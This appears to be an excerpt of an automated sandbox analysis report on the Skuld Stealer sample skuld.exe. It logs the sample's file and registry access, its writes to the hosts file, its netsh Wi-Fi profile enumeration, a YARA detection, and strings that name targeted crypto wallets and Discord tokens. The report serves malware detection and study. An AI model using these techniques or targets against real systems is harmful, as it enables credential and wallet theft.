                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\minidumps VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\saved-telemetry-pings VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\security_state VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\sessionstore-backups VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\temporary VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\to-be-removed VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vw7TwX1TN1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\skuld.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Uses netsh to modify the Windows network and firewall settings
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Skuld Stealer
                        Source: Yara matchFile source: skuld.exe, type: SAMPLE
                        Source: Yara matchFile source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instomitzerokernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDescsynctesttraceBufdeadlockraceFinipanicnilcgocheckrunnablerax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqinetedns0[::1]:53continue_gatewayinvalid address readfromunixgram
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: - `` - Jaxx%s%sCoreEverMathNamiTrontruefilereadopensyncpipelinkStatquitbindidle.com.exe.bat.cmdUUIDPOSTtext asn1nullbooljson'\''Host&lt;&gt;http1080DATAPINGEtag0x%xdateetagfromhostvaryDategzip%x
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in gotime: invalid numberJordan Standard TimeArabic Standard TimeIsrael Standard TimeTaipei Standard TimeAzores Standard TimeTurkey Standard TimeEgyptian_HieroglyphsMeroitic_Hieroglyphsinvalid DNS responsegetadaptersaddressesunexpected network: form-data; name="%s"EnterCriticalSectionGetFileAttributesExALeaveCriticalSectionSystemTimeToFileTimeGetSidLengthRequiredenter-recursive-loopnumber has no digitsexpression too largeinvalid repeat countBad chunk length: %dbad palette length: invalid image size: unknown PSK identitycertificate requiredgzip: invalid headerheader line too longx509usefallbackrootsmissing IPv6 addressunexpected characterflate: closed writersha3: Sum after Readzlib: invalid headergetCert can't be nilinvalid UTF-8 stringx509: malformed spkiunsupported suite IDinvalid integer typeSafeArrayDestroyDataSafeArrayGetElemsizesystemexplorerserviceSystemParametersInfoWwin32_VideoController-SubmitSamplesConsentcore.asar not in bodyDiscordTokenProtectordiscordtokenprotectorProtectionPayload.dllintegrity_checkmoduleUbisoft Game LauncherTous les utilisateurs\Exodus\exodus.walletreflect.Value.Complextrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage not installedblock device requiredstate not recoverableread-only file systemstale NFS file handleReadDirectoryChangesWNetGetJoinInformationLookupPrivilegeValueWAdjustTokenPrivilegesexec: already startedunsupported operationinternal error: rc %dsequence tag mismatchafter top-level valuein string escape codekey is not comparableclipboard unavailablenot dib format data: bufio: negative counthttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vheader list too largeUnhandled Setting: %vnet/http: nil Contextunknown address type command not supportedPrecondition RequiredInternal Server ErrorWindows Code Page 858186264514923095703125931322574615478515625GetVolumeInformationWEnableCounterForIoctlCM_Get_DevNode_StatusChangeServiceConfig2WDeregisterEventSourceEnumServicesStatusExWGetNamedSecurityInfoWSetNamedSecurityInfoWDwmGetWindowAttributeDwmSetWindowAttributeNtCreateNamedPipeFileSetupDiEnumDeviceInfoSetupUninstallOEMInfWWSALookupServiceNextWWTSEnumerateSessionsWbad type in compare: of unexported methodunexpected value stepreflect.Value.SetZeroreflect.Value.Pointerreflect.Value.SetUintNetUserGetLocalGroupsGetProfilesDirectoryWnegative shift amountdataindependenttimingsystem goroutine wait/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead:
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullhttp: blank cookiereceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-Lengthfield value for %qIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)adaptivestackstartdontfreezetheworldtraceadvanceperiodtracebackancestorsgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldwait until GC endsbad lfnode addresssystem page size ( but memory size /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
